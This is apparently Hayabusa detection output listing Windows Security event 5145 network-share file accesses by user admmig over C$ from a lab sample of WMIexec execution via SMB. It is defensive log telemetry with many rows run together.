10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 
